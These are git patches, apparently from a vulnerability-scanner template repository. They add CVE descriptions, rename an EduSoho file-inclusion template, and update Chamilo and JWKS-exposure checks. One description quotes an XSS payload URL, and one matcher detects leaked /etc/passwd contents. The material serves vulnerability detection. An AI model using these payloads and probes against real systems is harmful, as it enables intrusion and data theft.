\u003e= 6.2-milestone-1 - Cross-Site Scripting","Severity":"medium","Description":"XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Users are able to forge an URL with a payload allowing to inject Javascript in the page (XSS). It's possible to exploit the DeleteApplication page to perform a XSS, e.g. by using URL such as: \u003e xwiki/bin/view/AppWithinMinutes/DeleteApplication?appName=Menu\u0026resolve=true\u0026xredirect=javascript:alert(document.domain). This vulnerability exists since XWiki 6.2-milestone-1. The vulnerability has been patched in XWiki 14.10.5 and 15.1-rc-1.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-35161.yaml"} {"ID":"CVE-2023-35162","Info":{"Name":"XWiki \u003c 14.10.5 - Cross-Site Scripting","Severity":"medium","Description":"XWiki Platform is vulnerable to reflected XSS via the previewactions template. An attacker can inject JavaScript through the xcontinue parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-35162.yaml"} {"ID":"CVE-2023-35813","Info":{"Name":"Sitecore - Remote Code Execution","Severity":"critical","Description":"Multiple Sitecore products allow remote code execution. This affects Experience Manager, Experience Platform, and Experience Commerce through 10.3.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-35813.yaml"} {"ID":"CVE-2023-35843","Info":{"Name":"NocoDB version \u003c= 0.106.1 - Arbitrary File Read","Severity":"high","Description":"NocoDB through 0.106.1 has a path traversal vulnerability that allows an unauthenticated attacker to access arbitrary files on the server by manipulating the path parameter of the /download route. This vulnerability could allow an attacker to access sensitive files and data on the server, including configuration files, source code, and other sensitive information.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-35843.yaml"} @@ -2294,6 +2299,7 @@ {"ID":"CVE-2023-46747","Info":{"Name":"F5 BIG-IP - Unauthenticated RCE via AJP Smuggling","Severity":"critical","Description":"CVE-2023-46747 is a critical severity authentication bypass vulnerability in F5 BIG-IP that could allow an unauthenticated attacker to achieve remote code execution (RCE). The vulnerability impacts the BIG-IP Configuration utility, also known as the TMUI, wherein arbitrary requests can bypass authentication. The vulnerability received a CVSSv3 score of 9.8.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-46747.yaml"} {"ID":"CVE-2023-46805","Info":{"Name":"Ivanti ICS - Authentication Bypass","Severity":"high","Description":"An authentication bypass vulnerability in the web component of Ivanti ICS 9.x, 22.x and Ivanti Policy Secure allows a remote attacker to access restricted resources by bypassing control checks.","Classification":{"CVSSScore":"8.2"}},"file_path":"http/cves/2023/CVE-2023-46805.yaml"} {"ID":"CVE-2023-47115","Info":{"Name":"Label Studio - Cross-Site Scripting","Severity":"high","Description":"Versions prior to 1.9.2 have a cross-site scripting (XSS) vulnerability that could be exploited when an authenticated user uploads a crafted image file for their avatar that gets rendered as a HTML file on the website.\n","Classification":{"CVSSScore":"7.1"}},"file_path":"http/cves/2023/CVE-2023-47115.yaml"} +{"ID":"CVE-2023-47117","Info":{"Name":"Label Studio - Sensitive Information Exposure","Severity":"high","Description":"An attacker can construct a filter chain to filter tasks based on sensitive fields for all user accounts on the platform by exploiting Django's Object Relational Mapper (ORM). Since the results of query can be manipulated by the ORM filter, an attacker can leak these sensitive fields character by character.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-47117.yaml"} {"ID":"CVE-2023-4714","Info":{"Name":"PlayTube 3.0.1 - Information Disclosure","Severity":"high","Description":"A vulnerability was found in PlayTube 3.0.1 and classified as problematic. This issue affects some unknown processing of the component Redirect Handler. The manipulation leads to information disclosure. The attack may be initiated remotely.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-4714.yaml"} {"ID":"CVE-2023-47211","Info":{"Name":"ManageEngine OpManager - Directory Traversal","Severity":"high","Description":"A directory traversal vulnerability exists in the uploadMib functionality of ManageEngine OpManager 12.7.258. A specially crafted HTTP request can lead to arbitrary file creation. An attacker can send a malicious MiB file to trigger this vulnerability.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2023/CVE-2023-47211.yaml"} {"ID":"CVE-2023-47218","Info":{"Name":"QNAP QTS and QuTS Hero - OS Command Injection","Severity":"medium","Description":"An OS command injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow users to execute commands via a network. We have already fixed the vulnerability in the following versions: QTS 5.1.5.2645 build 20240116 and later QuTS hero h5.1.5.2647 build 20240118 and later QuTScloud c5.1.5.2651 and later.\n","Classification":{"CVSSScore":"5.8"}},"file_path":"http/cves/2023/CVE-2023-47218.yaml"} @@ -2400,6 +2406,7 @@ {"ID":"CVE-2024-25600","Info":{"Name":"Unauthenticated Remote Code Execution – Bricks \u003c= 1.9.6","Severity":"critical","Description":"Bricks Builder is a popular WordPress development theme with approximately 25,000 active installations. It provides an intuitive drag-and-drop interface for designing and building WordPress websites. Bricks \u003c= 1.9.6 is vulnerable to unauthenticated remote code execution (RCE) which means that anybody can run arbitrary commands and take over the site/server. This can lead to various malicious activities\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-25600.yaml"} {"ID":"CVE-2024-25669","Info":{"Name":"CaseAware a360inc - Cross-Site Scripting","Severity":"medium","Description":"a360inc CaseAware contains a reflected cross-site scripting vulnerability via the user parameter transmitted in the login.php query string. This is a bypass of the fix reported in CVE-2017-\u003e\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-25669.yaml"} {"ID":"CVE-2024-25735","Info":{"Name":"WyreStorm Apollo VX20 - Information Disclosure","Severity":"high","Description":"An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. Remote attackers can discover cleartext credentials for the SoftAP (access point) Router /device/config using an HTTP GET request.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-25735.yaml"} +{"ID":"CVE-2024-25852","Info":{"Name":"Linksys RE7000 - Command Injection","Severity":"high","Description":"Linksys RE7000 v2.0.9, v2.0.11, and v2.0.15 have a command execution vulnerability in the \"AccessControlList\" parameter of the access control function point\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-25852.yaml"} {"ID":"CVE-2024-2621","Info":{"Name":"Fujian Kelixin Communication - Command Injection","Severity":"medium","Description":"A vulnerability was found in Fujian Kelixin Communication Command and Dispatch Platform up to 20240318 and classified as critical. Affected by this issue is some unknown functionality of the file api/client/user/pwd_update.php.\n","Classification":{"CVSSScore":"6.3"}},"file_path":"http/cves/2024/CVE-2024-2621.yaml"} {"ID":"CVE-2024-26331","Info":{"Name":"ReCrystallize Server - Authentication Bypass","Severity":"high","Description":"This vulnerability allows an attacker to bypass authentication in the ReCrystallize Server application by manipulating the 'AdminUsername' cookie. This gives the attacker administrative access to the application's functionality, even when the default password has been changed.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-26331.yaml"} {"ID":"CVE-2024-27198","Info":{"Name":"TeamCity \u003c 2023.11.4 - Authentication Bypass","Severity":"critical","Description":"In JetBrains TeamCity before 2023.11.4 authentication bypass allowing to perform admin actions was possible\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-27198.yaml"} @@ -2438,9 +2445,11 @@ {"ID":"CVE-2024-32709","Info":{"Name":"WP-Recall \u003c= 16.26.5 - SQL Injection","Severity":"critical","Description":"The WP-Recall Registration, Profile, Commerce \u0026 More plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 16.26.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.3"}},"file_path":"http/cves/2024/CVE-2024-32709.yaml"} {"ID":"CVE-2024-3273","Info":{"Name":"D-Link Network Attached Storage - Command Injection and Backdoor Account","Severity":"critical","Description":"UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, was found in D-Link DNS-320L, DNS-325, DNS-327L and DNS-340L up to 20240403. Affected is an unknown function of the file /cgi-bin/nas_sharing.cgi of the component HTTP GET Request Handler. The manipulation of the argument system leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259284. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-3273.yaml"} {"ID":"CVE-2024-3274","Info":{"Name":"D-LINK DNS-320L,DNS-320LW and DNS-327L - Information Disclosure","Severity":"medium","Description":"A vulnerability has been found in D-Link DNS-320L, DNS-320LW and DNS-327L up to 20240403 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /cgi-bin/info.cgi of the component HTTP GET Request Handler.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-3274.yaml"} +{"ID":"CVE-2024-33113","Info":{"Name":"D-LINK DIR-845L bsc_sms_inbox.php file - Information Disclosure","Severity":"medium","Description":"D-LINK DIR-845L \u003c=v1.01KRb03 is vulnerable to Information disclosurey via bsc_sms_inbox.php.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-33113.yaml"} {"ID":"CVE-2024-33288","Info":{"Name":"Prison Management System - SQL Injection Authentication Bypass","Severity":"high","Description":"Sql injection vulnerability was found on the login page in Prison Management System\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-33288.yaml"} {"ID":"CVE-2024-33575","Info":{"Name":"User Meta WP Plugin \u003c 3.1 - Sensitive Information Exposure","Severity":"medium","Description":"The User Meta is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.0 via the /views/debug.php file. This makes it possible for unauthenticated attackers, with to extract sensitive configuration data.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-33575.yaml"} {"ID":"CVE-2024-33605","Info":{"Name":"Sharp Multifunction Printers - Directory Listing","Severity":"high","Description":"It was observed that Sharp printers are vulnerable to an arbitrary directory listing without authentication. Any attacker can list any directory located in the printer and recover any file.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-33605.yaml"} +{"ID":"CVE-2024-33610","Info":{"Name":"Sharp Multifunction Printers - Cookie Exposure","Severity":"medium","Description":"It was observed that Sharp printers are vulnerable to a listing of session cookies without authentication. Any attacker can list valid cookies by visiting a backdoor webpage and use them to authenticate to the printers.","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2024/CVE-2024-33610.yaml"} {"ID":"CVE-2024-33724","Info":{"Name":"SOPlanning 1.52.00 Cross Site Scripting","Severity":"medium","Description":"SOPlanning v1.52.00 is vulnerable to XSS via the 'groupe_id' parameters a remote unautheticated attacker can hijack the admin account or other users. The remote attacker can hijack a users session or credentials and perform a takeover of the entire platform.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-33724.yaml"} {"ID":"CVE-2024-3400","Info":{"Name":"GlobalProtect - OS Command Injection","Severity":"critical","Description":"A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-3400.yaml"} {"ID":"CVE-2024-34102","Info":{"Name":"Adobe Commerce \u0026 Magento - CosmicSting","Severity":"critical","Description":"Adobe Commerce versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 and earlier are affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability that could result in arbitrary code execution.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-34102.yaml"} @@ -2448,9 +2457,12 @@ {"ID":"CVE-2024-3495","Info":{"Name":"Wordpress Country State City Dropdown \u003c=2.7.2 - SQL Injection","Severity":"critical","Description":"The Country State City Dropdown CF7 plugin for WordPress is vulnerable to SQL Injection via the ‘cnt’ and 'sid' parameters in versions up to, and including, 2.7.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-3495.yaml"} {"ID":"CVE-2024-34982","Info":{"Name":"LyLme-Spage - Arbitary File Upload","Severity":"high","Description":"An arbitrary file upload vulnerability in the component /include/file.php of lylme_spage v1.9.5 allows attackers to execute arbitrary code via uploading a crafted file.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-34982.yaml"} {"ID":"CVE-2024-3552","Info":{"Name":"Web Directory Free \u003c 1.7.0 - SQL Injection","Severity":"critical","Description":"The plugin does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection with different techniques like UNION, Time-Based and Error-Based.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-3552.yaml"} +{"ID":"CVE-2024-36401","Info":{"Name":"GeoServer RCE in Evaluating Property Name Expressions","Severity":"critical","Description":"In the GeoServer version prior to 2.25.1, 2.24.3 and 2.23.5 of GeoServer, multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users through specially crafted input against a default GeoServer installation due to unsafely evaluating property names as XPath expressions.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-36401.yaml"} {"ID":"CVE-2024-36412","Info":{"Name":"SuiteCRM - SQL Injection","Severity":"critical","Description":"SuiteCRM is an open-source Customer Relationship Management (CRM) software application. Prior to versions 7.14.4 and 8.6.1, a vulnerability in events response entry point allows for a SQL injection attack. Versions 7.14.4 and 8.6.1 contain a fix for this issue.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-36412.yaml"} {"ID":"CVE-2024-36527","Info":{"Name":"Puppeteer Renderer - Directory Traversal","Severity":"medium","Description":"puppeteer-renderer v.3.2.0 and before is vulnerable to Directory Traversal. Attackers can exploit the URL parameter using the file protocol to read sensitive information from the server.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-36527.yaml"} {"ID":"CVE-2024-36837","Info":{"Name":"CRMEB v.5.2.2 - SQL Injection","Severity":"high","Description":"SQL Injection vulnerability in CRMEB v.5.2.2 allows a remote attacker to obtain sensitive information via the getProductList function in the ProductController.php file.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-36837.yaml"} +{"ID":"CVE-2024-36991","Info":{"Name":"Splunk Enterprise - Local File Inclusion","Severity":"high","Description":"In Splunk Enterprise on Windows versions below 9.2.2, 9.1.5, and 9.0.10, an attacker could perform a path traversal on the /modules/messaging/ endpoint in Splunk Enterprise on Windows. This vulnerability should only affect Splunk Enterprise on Windows.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-36991.yaml"} +{"ID":"CVE-2024-37032","Info":{"Name":"Ollama - Remote Code Execution","Severity":"critical","Description":"Ollama before 0.1.34 does not validate the format of the digest (sha256 with 64 hex digits) when getting the model path, and thus mishandles the TestGetBlobsPath test cases such as fewer than 64 hex digits, more than 64 hex digits, or an initial ../ substring.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-37032.yaml"} {"ID":"CVE-2024-37152","Info":{"Name":"Argo CD Unauthenticated Access to sensitive setting","Severity":"medium","Description":"Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. The vulnerability allows unauthorized access to the sensitive settings exposed by /api/v1/settings endpoint without authentication. All sensitive settings are hidden except passwordPattern.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-37152.yaml"} {"ID":"CVE-2024-37393","Info":{"Name":"SecurEnvoy Two Factor Authentication - LDAP Injection","Severity":"critical","Description":"Multiple LDAP injections vulnerabilities exist in SecurEnvoy MFA before 9.4.514 due to improper validation of user-supplied input. An unauthenticated remote attacker could exfiltrate data from Active Directory through blind LDAP injection attacks against the DESKTOP service exposed on the /secserver HTTP endpoint. This may include ms-Mcs-AdmPwd, which has a cleartext password for the Local Administrator Password Solution (LAPS) feature.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-37393.yaml"} {"ID":"CVE-2024-37881","Info":{"Name":"SiteGuard WP Plugin \u003c= 1.7.6 - Login Page Disclosure","Severity":"medium","Description":"The SiteGuard WP Plugin plugin for WordPress is vulnerable to protection mechanism bypass in all versions up to, and including, 1.7.6. This is due to the plugin not restricting redirects from wp-register.php which may disclose the login page URL. This makes it possible for unauthenticated attackers to gain access to the login page.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-37881.yaml"} @@ -2459,11 +2471,15 @@ {"ID":"CVE-2024-4040","Info":{"Name":"CrushFTP VFS - Sandbox Escape LFR","Severity":"critical","Description":"VFS Sandbox Escape in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows remote attackers with low privileges to read files from the filesystem outside of VFS Sandbox.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-4040.yaml"} {"ID":"CVE-2024-4348","Info":{"Name":"osCommerce v4.0 - Cross-site Scripting","Severity":"medium","Description":"A vulnerability, which was classified as problematic, was found in osCommerce 4. Affected is an unknown function of the file /catalog/all-products. The manipulation of the argument cat leads to cross site scripting. It is possible to launch the attack remotely.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2024/CVE-2024-4348.yaml"} {"ID":"CVE-2024-4358","Info":{"Name":"Progress Telerik Report Server - Authentication Bypass","Severity":"critical","Description":"In Progress Telerik Report Server, version 2024 Q1 (10.0.24.305) or earlier, on IIS, an unauthenticated attacker can gain access to Telerik Report Server restricted functionality via an authentication bypass vulnerability.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-4358.yaml"} +{"ID":"CVE-2024-4434","Info":{"Name":"LearnPress WordPress LMS Plugin \u003c= 4.2.6.5 - SQL Injection","Severity":"critical","Description":"The LearnPress WordPress LMS Plugin plugin for WordPress is vulnerable to time-based SQL Injection via the ‘term_id’ parameter in versions up to, and including, 4.2.6.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-4434.yaml"} {"ID":"CVE-2024-4443","Info":{"Name":"Business Directory Plugin \u003c= 6.4.2 - SQL Injection","Severity":"critical","Description":"The Business Directory Plugin Easy Listing Directories for WordPress plugin for WordPress is vulnerable to time-based SQL Injection via the ‘listingfields’ parameter in all versions up to, and including, 6.4.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-4443.yaml"} {"ID":"CVE-2024-4577","Info":{"Name":"PHP CGI - Argument Injection","Severity":"critical","Description":"PHP CGI - Argument Injection (CVE-2024-4577) is a critical argument injection flaw in PHP.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-4577.yaml"} +{"ID":"CVE-2024-4836","Info":{"Name":"Edito CMS - Sensitive Data Leak","Severity":"high","Description":"Web services managed by Edito CMS (Content Management System) in versions from 3.5 through 3.25 leak sensitive data as they allow downloading configuration files by an unauthorized user.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-4836.yaml"} {"ID":"CVE-2024-4956","Info":{"Name":"Sonatype Nexus Repository Manager 3 - Local File Inclusion","Severity":"high","Description":"Path Traversal in Sonatype Nexus Repository 3 allows an unauthenticated attacker to read system files. Fixed in version 3.68.1.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-4956.yaml"} +{"ID":"CVE-2024-5084","Info":{"Name":"Hash Form \u003c= 1.1.0 - Arbitrary File Upload","Severity":"critical","Description":"The Hash Form Drag \u0026 Drop Form Builder plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'file_upload_action' function in all versions up to, and including, 1.1.0. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-5084.yaml"} {"ID":"CVE-2024-5230","Info":{"Name":"FleetCart 4.1.1 - Information Disclosure","Severity":"medium","Description":"Issues with information disclosure in redirect responses. Accessing the majority of the website's pages exposes sensitive data, including the \"Razorpay\" \"razorpayKeyId\".\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-5230.yaml"} {"ID":"CVE-2024-5522","Info":{"Name":"WordPress HTML5 Video Player \u003c 2.5.27 - SQL Injection","Severity":"critical","Description":"The HTML5 Video Player WordPress plugin before 2.5.27 does not sanitize and escape a parameter from a REST route before using it in a SQL statement, allowing unauthenticated users to perform SQL injection attacks\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-5522.yaml"} +{"ID":"CVE-2024-5947","Info":{"Name":"Deep Sea Electronics DSE855 - Authentication Bypass","Severity":"medium","Description":"Deep Sea Electronics DSE855 Configuration Backup Missing Authentication Information Disclosure Vulnerability. This vulnerability allows network-adjacent attackers to disclose sensitive information on affected installations of Deep Sea Electronics DSE855 devices. Authentication is not required to exploit this vulnerability. The specific flaw exists within the web-based UI. The issue results from the lack of authentication prior to allowing access to functionality. An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise. Was ZDI-CAN-22679.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-5947.yaml"} {"ID":"CVE-2024-6028","Info":{"Name":"Quiz Maker \u003c= 6.5.8.3 - SQL Injection","Severity":"critical","Description":"The Quiz Maker plugin for WordPress is vulnerable to time-based SQL Injection via the 'ays_questions' parameter in all versions up to, and including, 6.5.8.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-6028.yaml"} {"ID":"CVE-2001-1473","Info":{"Name":"Deprecated SSHv1 Protocol Detection","Severity":"high","Description":"SSHv1 is deprecated and has known cryptographic issues.","Classification":{"CVSSScore":"7.5"}},"file_path":"network/cves/2001/CVE-2001-1473.yaml"} {"ID":"CVE-2011-2523","Info":{"Name":"VSFTPD 2.3.4 - Backdoor Command Execution","Severity":"critical","Description":"VSFTPD v2.3.4 had a serious backdoor vulnerability allowing attackers to execute arbitrary commands on the server with root-level access. The backdoor was triggered by a specific string of characters in a user login request, which allowed attackers to execute any command they wanted.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2011/CVE-2011-2523.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index dbca2a3aa1..2dc5113fa0 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -121ccb9d0bc22208fc61de84492ee126 +0b3219f149946276f5354bd51c7072b4 From 06e4f3958087c35de6696b475919ec8f9bafa1f7 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 10 Jul 2024 11:48:54 +0530 Subject: [PATCH 1049/1841] minor update --- .../2023/CNVD-2023-03903.yaml} | 14 ++++++++++---- 1 file changed, 10 insertions(+), 4 deletions(-) rename http/{vulnerabilities/other/edusoho-lfi.yaml => cnvd/2023/CNVD-2023-03903.yaml} (84%) diff --git a/http/vulnerabilities/other/edusoho-lfi.yaml b/http/cnvd/2023/CNVD-2023-03903.yaml similarity index 84% rename from http/vulnerabilities/other/edusoho-lfi.yaml rename to http/cnvd/2023/CNVD-2023-03903.yaml index 4b13eb3f5f..53acee962e 100644 --- a/http/vulnerabilities/other/edusoho-lfi.yaml +++ b/http/cnvd/2023/CNVD-2023-03903.yaml @@ -1,9 +1,9 @@ -id: edusoho-lfi +id: CNVD-2023-03903 info: name: EduSoho < v22.4.7 - Local File Inclusion author: securityforeveryone - severity: critical + severity: high description: | The edusoho education and training system EduSoho" || (body="Powered By EduSoho" && body="var app") - tags: EduSoho,classroom-course,CNVD-2023-03903,lfi + tags: cnvd,cnvd2023,lfi,edushoho http: - raw: @@ -26,9 +26,15 @@ http: matchers-condition: and matchers: - type: regex + part: body regex: - "root:.*:0:0:" + - type: word + part: content_type + words: + - "text/csv" + - type: status status: - 200 From c40099f8a8cabd9464dc01d85a9cdb67bcc7deb0 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 10 Jul 2024 12:04:46 +0530 Subject: [PATCH 1050/1841] minor update --- http/cves/2023/CVE-2023-4220.yaml | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/http/cves/2023/CVE-2023-4220.yaml b/http/cves/2023/CVE-2023-4220.yaml index 31e7c3c23f..3f69ea23a4 100644 --- a/http/cves/2023/CVE-2023-4220.yaml +++ b/http/cves/2023/CVE-2023-4220.yaml @@ -1,4 +1,5 @@ id: CVE-2023-4220 + info: name: Chamilo LMS <= 1.11.24 - Remote Code Execution author: securityforeveryone @@ -9,6 +10,7 @@ info: - https://github.com/Ziad-Sakr/Chamilo-LMS-CVE-2023-4220-Exploit - https://nvd.nist.gov/vuln/detail/CVE-2023-4220 - https://github.com/charlesgargasson/CVE-2023-4220 + - https://starlabs.sg/advisories/23/23-4220/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 @@ -20,8 +22,9 @@ info: metadata: vendor: chamilo product: chamilo_lms - shodan-query: cpe:"cpe:2.3:a:chamilo:chamilo_lms" - tags: cve,cve2023,chamilo,lms,rce + shodan-query: "X-Powered-By: Chamilo" + tags: cve,cve2023,chamilo,lms,rce,intrusive,file-upload + variables: filename: "{{rand_base(10)}}" num: "{{rand_int(1000, 9999)}}" From 220cede8c84e6e0f8f8c9ae9ccf8d876c892db62 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 10 Jul 2024 12:19:34 +0530 Subject: [PATCH 1051/1841] Update jwk-json-leak.yaml --- http/exposures/tokens/jwk-json-leak.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/http/exposures/tokens/jwk-json-leak.yaml b/http/exposures/tokens/jwk-json-leak.yaml index 218b172a38..22521427bd 100644 --- a/http/exposures/tokens/jwk-json-leak.yaml +++ b/http/exposures/tokens/jwk-json-leak.yaml @@ -19,6 +19,8 @@ http: path: - "{{BaseURL}}/.well-known/jwks.json" - "{{BaseURL}}/.well-known/jwks" + - "{{BaseURL}}/.well-known/openid-configuration/jwks.json" + - "{{BaseURL}}/.well-known/openid-configuration/jwks"" - "{{BaseURL}}/jwks.json" - "{{BaseURL}}/jwks" @@ -38,4 +40,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b718974b135dcbaf5491507c379544edddca58967a6ef8f72eeea45fe2059cb102207edaf758be880a6f6ed1a1cf5e9ac4750f27230c4eac03dd9f0938c88224f416:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b718974b135dcbaf5491507c379544edddca58967a6ef8f72eeea45fe2059cb102207edaf758be880a6f6ed1a1cf5e9ac4750f27230c4eac03dd9f0938c88224f416:922c64590222798bb761d5b6d8e72950 From 56c3dfce53822b9599e47e593ba270a2e2a13dc8 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 10 Jul 2024 12:22:14 +0530 Subject: [PATCH 1052/1841] fix mapping --- http/exposures/tokens/jwk-json-leak.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/exposures/tokens/jwk-json-leak.yaml b/http/exposures/tokens/jwk-json-leak.yaml index 22521427bd..a5603dfd57 100644 --- a/http/exposures/tokens/jwk-json-leak.yaml +++ b/http/exposures/tokens/jwk-json-leak.yaml @@ -20,7 +20,7 @@ http: - "{{BaseURL}}/.well-known/jwks.json" - "{{BaseURL}}/.well-known/jwks" - "{{BaseURL}}/.well-known/openid-configuration/jwks.json" - - "{{BaseURL}}/.well-known/openid-configuration/jwks"" + - "{{BaseURL}}/.well-known/openid-configuration/jwks" - "{{BaseURL}}/jwks.json" - "{{BaseURL}}/jwks" From f805d0ceceefe1faacc50a3a3154b28fb967a9f5 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 10 Jul 2024 06:55:25 +0000 Subject: [PATCH 1054/1841] Auto Generated Templates Checksum [Wed Jul 10 06:55:25 UTC 2024] :robot: --- templates-checksum.txt | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 5c41d92a8b..1d059a21c4 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -223,8 +223,8 @@ code/privilege-escalation/linux/rw-sudoers.yaml:f974b1d1a68fd7a8cd24b6f1b61855dd code/privilege-escalation/linux/sudo-nopasswd.yaml:3117c141f35b9229b6ebe1db10a4fef77aa6ee17 code/privilege-escalation/linux/writable-etc-passwd.yaml:c0ad4796f42aab9c901b52b52b91940172d070e9 contributors.json:951e2ab8bbae42da01f52da9ef0a14ce7f17e159 -cves.json:471863c8bfa08cf82c7c5ab76b1b2aa3549672b8 